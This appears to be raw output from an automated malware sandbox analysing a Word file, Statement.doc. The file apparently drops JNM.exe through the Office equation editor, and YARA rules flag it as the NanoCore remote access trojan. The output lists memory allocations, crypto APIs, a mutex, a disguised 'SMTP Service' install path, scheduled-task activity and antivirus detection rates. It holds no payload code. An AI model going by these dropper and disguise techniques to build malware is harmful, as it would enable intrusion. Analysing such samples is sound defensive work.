        Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\JNM.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Windows\SysWOW64\timeout.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00400AC4 NtSetInformationThread,3_2_00400AC4
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00408E03 NtSetInformationThread,3_2_00408E03
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00450AC4 NtSetInformationThread,15_2_00450AC4
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00458DE5 NtSetInformationThread,15_2_00458DE5
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B0AC4 NtSetInformationThread,16_2_003B0AC4
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B8E03 NtSetInformationThread,16_2_003B8E03
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_00404BE83_2_00404BE8
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 3_2_004048813_2_00404881
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044E0387_2_0044E038
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C0B07_2_0044C0B0
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_004443A07_2_004443A0
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044B4987_2_0044B498
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_004437887_2_00443788
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C16E7_2_0044C16E
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_0044C1297_2_0044C129
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 7_2_004444587_2_00444458
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00454BE815_2_00454BE8
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 15_2_00454BDA15_2_00454BDA
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B4BE816_2_003B4BE8
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 16_2_003B4BDA16_2_003B4BDA
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_002143A023_2_002143A0
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_0021378823_2_00213788
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_00214C7823_2_00214C78
        Source: C:\Users\user\AppData\Roaming\JNM.exeCode function: 23_2_0021445823_2_00214458
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 26_2_003F43A026_2_003F43A0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 26_2_003F378826_2_003F3788
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 26_2_003F445826_2_003F4458
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2355980746.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000017.00000002.2141461883.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2148462400.00000000022E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000001A.00000002.2147229612.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000F.00000002.2362914038.0000000005389000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2359067091.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2356337271.0000000000620000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000007.00000002.2356349375.0000000000630000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000001A.00000002.2148652827.00000000032E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000010.00000002.2173210741.0000000005059000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2144054472.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000017.00000002.2143981724.0000000002541000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000003.00000002.2359611751.00000000038C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: JNM.exe PID: 1692, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: JNM.exe PID: 2304, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: JNM.exe PID: 2360, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.620000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 7.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.630000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 26.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 7.2.JNM.exe.630000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 23.2.JNM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 7.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 23.2.JNM.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
        Source: 26.2.smtpsvc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: JNM.exe, 00000003.00000002.2356181917.00000000004D6000.00000004.00000020.sdmpBinary or memory string: Pinaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: JNM.exe, 0000000F.00000002.2356007529.0000000000373000.00000004.00000020.sdmpBinary or memory string: 8inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@32/13@16/2
        Source: C:\Users\user\AppData\Roaming\JNM.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$atement.docJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{9a83c6a0-5b64-416c-b0dc-d47048e32edf}
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD27B.tmpJump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ......................$...........W.a.i.t.i.n.g. .f.o.r. .1.....H........e......................0...............(.........................$.....Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.......J.................$.....Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....d.......,.......H........e......................e. .............(..........................s....Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....d.......,.......H.......#e......................e. .............(..........................s....Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................0.%...............%.....(.P.....$........................j......................................................................Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................@.'...............'.....(.P.............|................l......................................................................Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................X.............W.a.i.t.i.n.g. .f.o.r. .1..............p......................0.................%.............................Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............%.....J.......................Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P..............................q......................e. ...............%.......................7s....Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............................&q......................e. ...............%.......................7s....Jump to behavior
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................@.............W.a.i.t.i.n.g. .f.o.r. .1..............r......................0.................#.............................
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............#.....J.......................
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............l...............!s......................e. ...............#.......................1s....
        Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.............l.......@.......Gs......................e. ...............#.......................1s....
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Roaming\JNM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Statement.docVirustotal: Detection: 45%
        Source: Statement.docReversingLabs: Detection: 58%
